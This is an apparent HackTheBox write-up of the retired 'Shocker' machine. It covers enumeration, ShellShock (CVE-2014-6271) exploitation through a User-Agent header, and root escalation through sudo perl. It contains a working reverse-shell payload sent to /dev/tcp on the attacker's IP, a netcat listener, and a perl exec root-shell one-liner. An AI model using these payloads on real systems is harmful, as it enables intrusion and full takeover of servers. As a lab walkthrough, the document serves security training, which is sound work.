This was classified as an easy machine by mrb3n on HackTheBox. We will find a webpage on port 80 with an image, running a directory brute force on it with a trailing slash; we will find a user.sh. We will intercept this request, find out that it is vulnerable to ShellShock (CVE-2014-6271) and gain a foothold in the box. To privilege escalate, we will find that the user can run Perl as root, then we will run Perl to execute Bash.
| OS | Difficulty | IP Address | Status |
|---|---|---|---|
| Linux | Easy | 10.10.10.56 | Retired |
Phase 1 - Enumeration
Nmap
As usual, we start off with a Nmap to find out what ports are opened:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77🇩🇪cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see there’s only two ports opened: a webserver running Apache on port 80 and OpenSSH on port 2222.
Port 80
Opening up the webpage in the browser, we only get an image:
Doing a directory brute force we find:
/cgi-bin/ (Status: 403) [Size: 294]
Doing another directory brute force on /cgi-bin/ we find:
/user.sh (Status: 200) [Size: 119]
When we access user.sh, we can get an output that looks like the uptime command on Linux:
cat user.sh
Content-Type: text/plain
Just an uptime test script
20:40:25 up 27 min, 0 users, load average: 0.00, 0.01, 0.00
Phase 2 - Exploitation
CVE-2014-6271
As the name of this box, ShellShock, suggests that it is vulnerable to ShellShock, AKA Bashdoor or CVE-2014-6271. This was a vulnerability discovered in Bash, back in 2014 which hash to with Bash syntax for defining functions.
Finding ShellShock
We can run a Nmap script scan to check for this:
nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/user.sh 10.10.10.56
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
| http://seclists.org/oss-sec/2014/q3/685
| http://www.openwall.com/lists/oss-security/2014/09/24/10
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
Reading a bunch of different articles and fuzzing the /cgi-bin/user.sh parameter in Burp Suite, we find a method to execute commands on the box:
The “User-Agent:” parameter can be abused by ShellShock and allow command execution:
User-Agent: () { :;}; echo; /usr/bin/id
We use echo because without it, it will return no value from the command. So let’s get a shell on ShellShock!
User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.15/443 0>&1
sudo nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.56] 45314
bash: no job control in this shell
[email protected]:/usr/lib/cgi-bin$
And we get in as the user shelly!
Phase 3 - Privilege Escalation
Perl for Root
Checking what commands the user shelly can run as root, we see /usr/bin/perl
[email protected]:/home/shelly$ sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl
Perl has a -e flag to execute from the command line, and it also has an exec command to run shell commands. Putting those two together we can run Bash as root.
[email protected]:/home/shelly$ sudo perl -e 'exec "/bin/bash"'
[email protected]:/home/shelly#